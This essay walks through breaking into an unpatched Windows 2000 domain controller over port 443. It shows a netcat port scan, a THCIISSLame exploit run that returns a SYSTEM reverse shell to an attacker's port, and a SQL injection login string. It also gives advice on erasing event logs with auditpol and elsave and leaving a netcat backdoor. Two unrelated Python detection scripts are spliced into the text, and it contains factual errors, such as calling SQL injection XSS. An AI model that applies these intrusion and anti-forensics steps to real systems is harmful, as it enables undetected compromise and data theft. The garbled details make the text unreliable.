Using of Windows 2000 - Essay Example

Abstract

The internet is growing by leaps and bounds with every passing day. More and more human functions are migrating to the internet, commerce and related activities among them. Myriad protocols have been developed over the years to protect computing systems that handle commerce transactions and contain highly confidential information: names, credit card numbers, credit histories, social security numbers, bank account details, addresses, phone numbers and the like. There is a dire need to protect such information from prying eyes (Scambray et al., 2003). The reputation of a company might be at stake if such information were divulged, and people's privacy would be compromised on a grand scale if it went public. There is also the risk of exploitation of such information. Numerous systems have been developed to protect these computing systems, but loopholes still remain. This text is centred on an exploit for port 443 on a Windows 2000 based domain controller.

Contents: Abstract; Introduction; Vulnerabilities in Networks; Delineating HTTPS and Port 443; Case Study (Assumptions, Way Forward, Analysis of Assumptions, Gathering Intel for Attack, Accessing the Server, Reason for Buffer Overflow, Securing a Foothold); Conclusion; Bibliography.

Introduction

Windows 2000 was developed by Microsoft as a business solution to host data and other services. Four editions of Windows 2000 were released: Professional, Server, Advanced Server and Datacentre Server. Other limited editions were also released by Microsoft in 2001, but the baseline of Windows 2000 as a business machine persisted (Pastore, 2003). On its release, Windows 2000 was marketed as the most secure Windows ever built (Microsoft, 2000). However, security flaws within the Windows 2000 framework continued to plague the system right up to the end of its lifecycle in July 2010, when Microsoft stopped issuing new security updates (Microsoft, 2011).

Vulnerabilities in Networks

Windows 2000 has been likened to an eggshell. Like the egg's shell, the exterior security layer is robust yet brittle: as soon as it is breached, the inside of the network is "mushy" and easier to manipulate. This general principle is not limited to Windows 2000 based network servers but applies to networks in general (Ethical Hacker Network, 2011). Various vulnerabilities exist on network machines, especially in respect of ports that can be scanned and accessed for intrusion. Every exposed port has the potential to become a vector for an attack on the machine concerned. The most common ports used by applications on a typical Windows based machine are listed below to delineate the exposure (Ethical Hacker Network, 2011).

    TCP port   Application
    20         FTP data channel
    21         FTP control channel
    23         Telnet
    25         SMTP
    53         Connection-oriented DNS (resolution on UDP 53)
    80         HTTP
    88         Internet Key Exchange (IKE)
    110        POP3 (mail)
    135        Windows RPC Endpoint Mapper
    137        NetBIOS Name Service
    139        NetBIOS Session
    389        LDAP
    443        HTTP/S
    445        Common Internet File System / native SMB on Windows 2000 and higher
    636        LDAP over SSL
    1433       SQL Server (1434 if the port scanner can perform UDP too)
    1723       PPTP
    3268       LDAP to a Windows Global Catalogue Server
    3389       Remote Desktop Protocol (Windows Terminal Service)

It must be kept in mind that these ports apply to Windows based machines. If another OS is in use, the machine's vulnerability may lie at other open ports (McInerney, 2000). This investigation is concerned with port 443, used for HTTP/S services, and so it will be examined in more detail.

Delineating HTTPS and Port 443

HTTPS (Hyper Text Transfer Protocol Secure) is a combination of plain HTTP with an additional SSL/TLS security layer, which encrypts data moved through web pages. Generally this protocol is used for online payments and transactions. HTTPS is designed to create a secure channel over an otherwise insecure network. The aim is to provide adequate protection against eavesdroppers as well as man-in-the-middle attacks, given of course that reasonable ciphers are used and that the server's certificate is both verified and trusted (Cox & Sheldon, 2001). Browsers ask for a certificate whenever an HTTPS connection is to be established. HTTP URLs begin with the prefix "http://" and use port 80 by default; HTTPS URLs begin with the prefix "https://" and use port 443 by default (Eckersley, 2010).

Case Study

Assumptions

For the current case study it is assumed that the machine concerned is running Windows 2000 Advanced Server and is being used as a domain controller. The IP address of the machine is 192.168.204.13 and the only port visible to the intruder is TCP port 443. Moreover, the server is not using IPsec or Kerberos at all, and no service packs have been installed on it.

Way Forward

In order to intrude upon the server, the attacker would first have to build a picture of the entire network using various tools. With a complete picture of the network, the attacker could better choose tools to penetrate the system, and once the right tools have been used to penetrate it, the attacker can easily exploit vulnerabilities in Windows to his advantage. An explanation of these steps and the precautions required on the part of the attacker is given below.

Analysis of Assumptions

The assumptions imply that the only port visible on the target machine is port 443. This implies that the machine is using some kind of port blocking: either the server is running a firewall, or it is protected by a router acting as a gatekeeper. It is also highly likely that such a system has an IDS (Intrusion Detection System) installed. Thus, the attacker should do their best to limit traffic so that their location is not compromised, and if a lot of communication is required, the attacker would have to use IP hopping tools too. Furthermore, the server is using neither IPsec nor Kerberos, which means that the intruder will not have to face encrypted communication.

Gathering Intel for Attack

Before an attack is commenced, it is vital to find out what the network topology is. Various tools are available to this end. The kinds of information that can be extracted by "network footprinting" include (but are not limited to): network and address ranges; host names; exposed hosts; applications exposed on hosts; OS and application version information; patch state of both hosts and applications; structure of applications and of back-end servers. One notable technique is to use ICMP (Internet Control Message Protocol), given of course that it has not been blocked (Network Sorcery, 2011). In a majority of cases this service is not blocked. It is advisable to check for this protocol as follows:

    c:\DiscoverHosts 192.168.204
    192.168.204.13

If ICMP is blocked, various port scanners can be used to discover this information. The list of tools is huge, but the more notable ones include nmap, enum, LANguard, netcat etc.
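Seen from the defender's side, a sweep of TCP ports 1-500 of the kind this section describes produces many connection attempts from one source to distinct ports on the domain controller, and the slow-scan delay the text mentions is exactly what a short detection window misses. The following Python script is an added example (not part of the essay or of any tool it cites) that runs a sliding-window scan detector over constructed firewall log lines in an assumed "epoch src dst dport" format, contrasting a fast sweep with a slowed one.

```python
from collections import defaultdict, deque

TARGET = "192.168.204.13"  # the domain controller from the case study

def make_log(src, start_ts, interval, ports):
    # Construct synthetic firewall lines "epoch_seconds src dst dport",
    # one connection attempt per port (constructed sample data, not real logs).
    return [f"{start_ts + i * interval} {src} {TARGET} {port}"
            for i, port in enumerate(ports)]

FAST_SWEEP = make_log("10.0.0.5", 1000, 0, range(1, 501))    # no delay between probes
SLOW_SWEEP = make_log("10.0.0.6", 5000, 60, range(1, 501))   # one probe per minute
NORMAL_USE = make_log("10.0.0.7", 9000, 5, [80, 443, 80, 443, 80])

def detect_scans(lines, window_seconds, min_distinct_ports):
    """Return the set of source IPs that touched at least min_distinct_ports
    different ports on TARGET within any window_seconds span."""
    recent = defaultdict(deque)   # src -> deque of (ts, port) inside the window
    alerted = set()
    for line in sorted(lines, key=lambda l: int(l.split()[0])):
        ts, src, dst, port = line.split()
        if dst != TARGET:
            continue
        ts, port = int(ts), int(port)
        q = recent[src]
        q.append((ts, port))
        # Drop probes that have fallen out of the window.
        while q and ts - q[0][0] > window_seconds:
            q.popleft()
        if len({p for _, p in q}) >= min_distinct_ports:
            alerted.add(src)
    return alerted

def compare_windows(lines):
    # Effect of the window length: a tight window catches only the fast sweep,
    # a long window also catches the slowed sweep (at the cost of more state).
    return {
        "10s_window": detect_scans(lines, 10, 20),
        "1h_window": detect_scans(lines, 3600, 20),
    }

if __name__ == "__main__":
    for name, hits in compare_windows(FAST_SWEEP + SLOW_SWEEP + NORMAL_USE).items():
        print(name, sorted(hits))
```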
Using any typical port scanner would reveal something like the following:

    C:\warez\portscan
    Port 192.168.204.13:443 open
    Port 192.168.204.13:80 open

For this case, netcat was used to scan ports and the output is presented below:

    C:\> nc -v -w2 -z 192.168.204.13 1-500
    W2KSP0 [192.168.204.13] 80 (http) open
    W2KSP0 [192.168.204.13] 443 (https) open

The -z switch ensures that no data is sent on a TCP connection and that very limited data is sent on a UDP connection. If the attacker wishes to introduce delays between probes, the -i switch can be used so that a slow scan is performed; this is particularly useful to the attacker for masking their identity (Netcat, 2011). The output reveals that the machine in question is a web server, since it has port 80 open to support HTTP and port 443 open to support HTTPS. It is assumed here that port 80 is also open because it would be very strange if HTTP were not supported on a web server. However, the intrusion would still be worked through port 443 only. Another point must be noted here: if port 443 were closed, it would still be possible to reach the DC (Domain Controller) by routing the attack through the web server and through the DMZ. However, it is assumed here that port 443 was already open.

Accessing the Server

Once the network topology has been established, the next step is to find a foothold in the network. For this case, the DC is going to be attacked directly; no auxiliary machines are deemed present. A connection to the DC will now be established using port 443. This connection will be used to transfer malware or tools that can be used to cause further disruption or intrusion on the targeted systems. However, data can only be transferred to the server if such an exploit is available. Commonly, the favourite exploit at work is the buffer overflow.
Buffers are memory allocations where applications store data, and these buffers may overflow under certain conditions. Often the length of the stored data is not checked by the application, so the buffer overflows with the excess data. The overflowing data spills onto the stack, where it ends up being executed. This data is not the property of any particular user on the system, and thus it runs under the ownership of the operating system. In Windows based systems the operating system has far greater privileges than ordinary users, and any data transported and executed by the system goes unquestioned: the injected code is actually given OS or system privileges. The payload most frequently delivered by attackers is a simple command shell, which enables the attacker to use the attacked machine remotely as a system-privileged user. The open port ensures connectivity. Therefore, the attacker effectively becomes the system master using this method.

Given that an HTTPS based port is in use, the presence of a database is fairly obvious. The second exploit depends on a method better known as "SQL injection". SQL injection depends on poor coding on the server side, which transfers information and data by using a database's capabilities. The inputs are passed to the application, which in turn moves unvalidated data to the DBMS (Database Management System). The DBMS interprets the inputs as legitimate because they are passed as legitimate. The query executed by the DBMS can thus be rewritten, and this enables the attacker to rewrite a query in favour of his inputs (Ethical Hacker Network, 2011). The commonest vulnerability in this sense is known as XSS (cross site scripting), where the user's input is directly echoed to the screen. Often the username field is written as "xxx OR 1=1;--".
The injected 1=1 forces the DBMS to consider the user already logged in, since the statement terminates in 1=1, which is always true. XSS is reliably used to exploit systems with a DBMS (Ethical Hacker Network, 2011), but running a DBMS and writing a web application to prove the concept was not practicable for this exercise. Hence, the buffer overflow technique will be used in this text to access a server machine that is a DC. Various exploits are available that take advantage of the port 443 vulnerability. One such tool is Johnny Cyberpunk's THCIISSLame. Johnny belongs to The Hacker's Choice and posted thciislame.c to various mailing lists; it exploits Windows 2000 running IIS through the vulnerable library bound to the SSL port 443. The exploit simply sends back a remote shell running as SYSTEM to a user-defined port on the attacking machine. The output from the exploit for this case study is shown below:

    C:\tools>thciisslame 192.168.230.13 192.168.234.2 31337
    THCIISSLame v0.2 IIS 5.0 SSL remote root exploit
    tested on Windows 2000 Server german/english SP4
    by Johnny Cyberpunk (jcyberpunk@thc.org)
    [*] building buffer
    [*] connecting the target
    [*] exploit send
    [*] waiting for shell
    Microsoft Windows 2000 [Version 5.00.2195]
    © Copyright 1985-2000 Microsoft Corp.
    C:\Windows\system32>

Reason for Buffer Overflow

Technically this buffer overflow exploit stems from the use of legacy code in the SSL layer. The use of an old protocol, better known as PCT (Private Communications Transport), causes this vulnerability to surface. The problem came to light in April 2004, when Microsoft published security bulletin MS04-011, reporting that ISS (Internet Security Systems) had found a buffer overflow in the library used to implement SSL for IIS. PCT is an early protocol that Microsoft had used to provide cryptographic support for HTTP (ISS, 2008). However, this protocol had been superseded by SSL years earlier while the legacy code had not yet been removed; it was in fact still being used to provide SSL support within IIS (Fly Lib, 2011). It must be kept in mind that had this particular machine been patched, we would not have been able to perform the penetration. Windows Server 2003 has the PCT protocol disabled by default to ensure that this exploit cannot be used.

Securing a Foothold

The exploit output above indicates that the intrusion using the buffer overflow has succeeded. Now it is pertinent to check what status we have as a user on the system. For this the simple "whoami" is used to discern user privileges:

    C:\winnt\system32>whoami
    NT AUTHORITY\SYSTEM

The exploit has successfully provided us with system privileges, as mentioned before, and this gives us a free hand to do as we wish. The attacker now has a number of options at his disposal. At this stage, most attackers upload command line and other tools to the attacked machine in order to gain a permanent foothold. Attempts at securing the users and passwords on the target machine could also be made, and new users could be added. However, it is often more convenient to leave behind a trusted tool that will enable easy connection every time; netcat is one such versatile tool. Before using netcat, however, it is advisable to remove all traces of the attack. "auditpol" is often used to stop the auditing of system events (Microsoft, 2010). Similarly, the "elsave" tool is used to remove any event logs generated as a result of the attack (IBT, 1999). This ensures that the attacker's presence and intrusion remain undetected.
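From the defender's side, stopping auditing and clearing the local log leave traces of their own, and a copy of the Security log shipped off the host beforehand is out of reach of a local clear. The following Python script is an added example (not from the essay or its cited tools) that checks constructed Windows 2000 style Security log records in an assumed "record|event_id|user|description" export format; the event IDs 612 (audit policy change), 592 (new process created) and 517 (audit log cleared) are the NT-family Security log IDs as I know them and should be confirmed against your own exports.

```python
from dataclasses import dataclass

# Constructed Windows 2000 style Security log records in an assumed export
# format "record_number|event_id|user|description" (sample data, not real logs).
# COLLECTOR_COPY is what a remote log collector received before the clean-up;
# HOST_LOG_AFTER is what remains on the domain controller afterwards.
COLLECTOR_COPY = """\
1201|528|Administrator|Successful Logon: Logon Type: 2
1202|592|SYSTEM|A new process has been created: C:\\WINNT\\system32\\cmd.exe
1203|592|SYSTEM|A new process has been created: C:\\temp\\auditpol.exe
1204|612|SYSTEM|Audit Policy Change: Success: - Failure: -
1205|592|SYSTEM|A new process has been created: C:\\temp\\elsave.exe
"""
HOST_LOG_AFTER = """\
1206|517|SYSTEM|The audit log was cleared
"""

# Tools named in the essay's foothold stage, as they would appear in process
# creation events (assumed image names).
TOOL_WATCHLIST = {"auditpol.exe", "elsave.exe", "nc.exe"}

@dataclass
class Record:
    number: int
    event_id: int
    user: str
    description: str

def parse_records(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        number, event_id, user, description = line.split("|", 3)
        records.append(Record(int(number), int(event_id), user, description))
    return records

def analyse(collector_records, host_records):
    """Return (record_number, message) findings that point at audit tampering."""
    findings = []
    for rec in collector_records:
        if rec.event_id == 612:
            findings.append((rec.number, "audit policy changed (event 612)"))
        elif rec.event_id == 592:
            image = rec.description.rsplit("\\", 1)[-1].lower()
            if image in TOOL_WATCHLIST:
                findings.append((rec.number, f"watchlisted tool started: {image}"))
    for rec in host_records:
        if rec.event_id == 517:
            findings.append((rec.number, "audit log cleared (event 517)"))
    # Anything the collector holds that the host no longer has was removed
    # locally; clearing the host log cannot reach the forwarded copy.
    host_numbers = {r.number for r in host_records}
    missing = sorted(r.number for r in collector_records
                     if r.number not in host_numbers)
    if missing:
        findings.append((missing[0],
                         f"{len(missing)} records on collector are absent from host log"))
    return findings

def run_demo():
    return analyse(parse_records(COLLECTOR_COPY), parse_records(HOST_LOG_AFTER))

if __name__ == "__main__":
    for number, message in run_demo():
        print(number, message)
```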
"netcat" can be used to perform a variety of functions for the attacker (MUTS, 2010), which include (but are not limited to): serving as a backdoor or connect shell; serving as a reverse backdoor or reverse shell; transferring files (both from the attacker's and from the attacked machine); serving as a "honeypot" (recording incoming traffic information); and remote execution. It would be impracticable to show all the things that netcat can do, so such an explanation has been omitted.

Conclusion

The text above shows how simple exploits on common ports of an unpatched Windows 2000 system can be used with ease by following a prescribed methodology. Access to this system is all the more worrisome because the attacked system was a DC (Domain Controller). The records that could have been exploited include (but are not limited to) user account databases, transactional details, personal sensitive information etc. The need to stay up to date with the various patches offered by Microsoft is obvious, given the ease with which the attack was performed.

Bibliography

Cox, P. & Sheldon, T., 2001. Windows 2000 Security Handbook. Osborne.
Eckersley, P., 2010. Encrypt the Web with the HTTPS Everywhere extension. [Online] Available at: https://www.eff.org/deeplinks/2010/06/encrypt-web-https-everywhere-firefox-extension [Accessed 30 July 2011].
Ethical Hacker Network, 2011. Anatomy of a Hack. [Online] Available at: http://www.ethicalhacker.net/content/view/8/2/ [Accessed 29 July 2011].
Fly Lib, 2011. Manual: Hacking Exposed (Unauthenticated Attacks). [Online] Available at: http://flylib.com/books/en/2.818.1.30/1/ [Accessed 30 July 2011].
IBT, 1999. ELSave. [Online] Available at: http://www.ibt.ku.dk/jesper/ELSave/ [Accessed 31 July 2011].
ISS, 2008. Threat List. [Online] Available at: http://xforce.iss.net/xforce/alerts/id/168 [Accessed 31 July 2011].
McInerney, M., 2000. Windows NT Security. New York: Prentice Hall.
Microsoft, 2000. Microsoft and CyberSafe extend Windows 2000 security around the enterprise. [Online] Available at: http://www.microsoft.com/Presspass/press/2000/jan00/cybersafepr.mspx [Accessed 28 July 2011].
Microsoft, 2010. Auditpol. [Online] Available at: http://technet.microsoft.com/en-us/library/cc731451%28WS.10%29.aspx [Accessed 31 July 2011].
Microsoft, 2011. Microsoft Product Lifecycle Search. [Online] Available at: http://support.microsoft.com/lifecycle/search/?sort=PN&alpha=Windows+2000&Filter=FilterNO [Accessed 29 July 2011].
MUTS, 2010. Netcat 101. [Online] Available at: http://www.leetupload.com/database/Misc/Papers/NetCat_new.pdf [Accessed 31 July 2011].
Netcat, 2011. Netcat 1.10. [Online] Available at: http://nc110.sourceforge.net/ [Accessed 31 July 2011].
Network Sorcery, 2011. ICMP, Internet Control Message Protocol. [Online] Available at: http://www.networksorcery.com/enp/protocol/icmp.htm [Accessed 31 July 2011].
Pastore, M., 2003. A+ Certification Study Guide. McGraw Hill.
Scambray, J., McClure, S. & Kurtz, G., 2003. Hacking Exposed. Osborne.